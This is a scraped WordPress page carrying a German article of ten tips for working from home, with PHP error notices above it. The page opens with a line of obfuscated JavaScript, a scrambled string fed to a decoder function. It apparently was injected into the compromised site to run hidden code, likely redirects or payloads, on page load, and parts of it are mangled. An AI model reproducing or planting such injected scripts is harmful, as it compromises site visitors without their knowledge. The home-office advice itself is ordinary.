var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();
Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 18

Notice: Trying to access array offset on value of type null in /bitnami/wordpress/wp-content/plugins/sitepress-multilingual-cms/classes/plugins/wpml-plugins-check.php on line 22

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme-i18n.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578

Notice: Fehler beim Dekodieren einer JSON-Datei unter /opt/bitnami/wordpress/wp-includes/theme.json: Syntax error in /opt/bitnami/wordpress/wp-includes/functions.php on line 4578
10 Tipps für das Arbeiten im Home-Office - Switzerland

10 Tipps für das Arbeiten im Home-Office


1. Folge einer Routine
Folge deiner Morgenroutine. Stehe auf, dusche dich, ziehe dich an und mache vielleicht auch einen kurzen Spaziergang, bevor du dich an deinen Computer setzt und mit der Arbeit beginnst. Nur weil wir im Schlafanzug herumlaufen können, heißt das noch lange nicht, dass wir es auch tun müssen.

2. Lege einen bestimmten Arbeitsbereich fest 
Mache nicht den Fehler und arbeite von deinem Schlafzimmer aus, denn sehr bald würdest du dein Schlafzimmer mit nichts anderem assoziieren als mit deiner Arbeit. Wenn du dein Schlafzimmer mit deiner Arbeit in Verbindung bringst, kann dies dein Schlafverhalten negativ beeinflussen. Ein super Tipp an dich ist daher, einen eigenen Arbeitsbereich festzulegen. Investiere, sofern möglich, in einen bequemen Stuhl und achte auf deinen „Tech-Neck“. Das heißt, wenn du keinen externen Bildschirm verwenden kannst, versuche doch einfach, deinen Laptop auf einen Bücherstapel zu stellen, um deinem Nacken etwas Entspannung zu gönnen. Du könntest bei Telefonkonferenzen auch aufstehen.

3. Lege deine Vorsätze fest und mache Pausen
Es ist nie zu spät, seine Fähigkeiten im Zeitmanagement aufzufrischen, insbesondere wenn man von zu Hause aus arbeitet. Beginne jeden Tag damit, herauszufinden, was du an diesem Tag tun musst und wie du es tun willst. Unser Tipp ist also, in deinem Kalender Zeit für Pausen festzulegen, wenn auch nicht ausschließlich dazu, deine Zeit realistischer zu planen, sondern auch, um sicherzustellen, dass du Zeit zum Auftanken hast.

4. Steigere deine Kommunikation 
Normalerweise verbringen wir die meiste Zeit in unmittelbarer Nähe unserer Kollegen, was es einfacher macht, sich mühelos gegenseitig auszutauschen. Jetzt, da es an der Nähe fehlt, müssen wir darauf achten, diese Kommunikationswege offen zu halten. Glücklicherweise stehen uns heute massenhaft Kommunikationsmittel zur Verfügung, die uns bei Videogesprächen, Internet-Chats und sogar digitalen Whiteboards oder im Rahmen der Zusammenarbeit helfen. Und vergiss nicht, dass Einfühlungsvermögen wichtiger denn je ist, da ein Großteil der Kommunikation auf digitale Weise erfolgt. Versuche, dich täglich daran zu erinnern, stets mit positiven Vorsätzen zu starten, auch wenn du in der neuesten Chat-Nachricht eigentlich etwas anderes andeuten möchtest.

5. Sorge dich um dich selbst 
In Zeiten der Selbstisolierung besteht das Risiko, dass die Bedeutung von Leistungsfähigkeit und Glück in Frage gestellt werden. Zum Beispiel die Bedeutung der Selbstfürsorge. Du könntest jeden Tag etwas Zeit für Bewegung einplanen. Vielleicht brauchst du auch etwas Zeit für Meditation. Vielleicht reicht es aber auch aus, wenn du darauf achtest, dass du die geplanten Pausen einlegst. Egal, ob du im Büro oder zu Hause bist, du solltest deiner  Gesundheit und Sicherheit Vorrang geben.

6. Finde heraus, wo du arbeiten kannst
Die Unterstützung der Heimarbeit war eine einfache Arbeitgeberentscheidung, damit Mitarbeiter mithilfe ihres Laptops und Smartphones ihrer Arbeit nach gehen können. Dein Zuhause könnte jedoch für die Zwecke eines funktionierenden Heimarbeitsplatzes bisher weniger geeignet sein. Suche daher nach einer stimmigen Tisch-Stuhl-Kombination, die dir als guter Arbeitsplatz dienen kann. Plane den täglichen Auf- und Abbau deines Arbeitsumfeldes. Du benötigst einen geeigneten Ort, an dem du dich aufhalten kannst, ohne dass deine Familie durch ständige Büros an mehreren Stellen innerhalb deines Hauses oder deiner Wohnung verrückt wird.

7. Plane deinen Tag anders 
Unsere Arbeitstage im Büro variieren je nach Beruf. Für uns alle ist die einschneidendste Änderung der vorübergehende Wegfall persönlicher Besprechungen. Nimm dir etwas Zeit, um zu ermitteln, was in dieser neuen Situation unerlässlich und möglich ist. Die Besprechungen, die nach wie vor wichtig sind, werden in virtueller Weise stattfinden, da sie die einzige verbleibende Möglichkeit der Zusammenarbeit darstellen. Rechne damit, mehr Zeit für aufgabenorientierte Tätigkeiten zu haben, die du selbst anleitest und festlegst.

Auch die Mittagspause mit jemandem, der etwas für dich kocht, ist oft eine unverzichtbare Unterbrechung des Tagesablaufs. Eine gute Möglichkeit, deinem Leben Routine zu verleihen, ist die Planung eines Mittagsmenüs für die Woche. Jeden Tag zum Mittagessen von Grund auf etwas Neues zu kochen, ist zeitaufwendig. Die Essenslieferung von Restaurants in deiner näheren Umgebung ist auch eine Möglichkeit, um zum lokalen Geschäftsalltag beizutragen.

8. Stelle sicher, dass du über eine Breitbandverbindung und die nötigen Hilfsmittel verfügst.  
Der wahre Wert eines zweiten Monitors, einer zusätzlichen Maus und eines stabilen Internetzugangs wird im Büro vielleicht nicht deutlich. Du wirst deren Vorteile aber bald erkennen. Die Grundlage deines Heimarbeitsplatzes werden dein Smartphone und dein Laptop sowie leistungsstarke mobile Breitbandanschlüsse, die Stresstests unterzogen wurden, sein. Solltest du dich bei deinen täglichen Telefonkonferenzen bisher ausschließlich auf die Audiofunktionen stützen, empfehlen wir dir, auch die Videofunktionen in Betracht zu ziehen.  Videokonferenzen werden die verloren gegangenen persönlichen Beziehungen bei persönlichen Treffen ein wenig ausgleichen.

9. Bleibe, gemeinsam mit deiner Familie um dich herum, zielorientiert. 
Du bist vielleicht nicht allein zu Hause. Zwei Erwachsene, die von zu Hause aus arbeiten, wird in den meisten Familien zur neuen Realität, wobei der Heimunterricht deiner Kinder die Situation noch komplexer macht. Eine große Herausforderung, vor der wir alle stehen, ist die Frage, wie wir in diesem neuen Umfeld zielorientiert bleiben können. Versuche, zielorientiert zu bleiben, indem du dir Auszeiten für den Heimunterricht nimmst. Unterstützt euch gegenseitig bei der Organisation parallel ablaufender virtueller Besprechungen. Der Schlüssel zu deiner Leistungsfähigkeit liegt darin, ununterbrochen Zeit für deine aufgabenorientierte Arbeit zu finden.

10. Experimentiere und entwickle deine digitalen Fähigkeiten weiter 
Die nächsten Wochen werden deine digitalen Schwächen aufdecken. Es besteht die hervorragende Gelegenheit, Lücken in zukünftige Vorteile zu verwandeln. Nutze die Gelegenheit, mit neuen digitalen Hilfsmitteln und Fertigkeiten zu experimentieren. Erstelle kurze Videos oder Podcasts für deine Kunden. Es bietet sich gerade die hervorragende Gelegenheit, in neuen Bereichen auf Fortschritt vor Perfektionierung zu drängen.

This site is registered on wpml.org as a development site.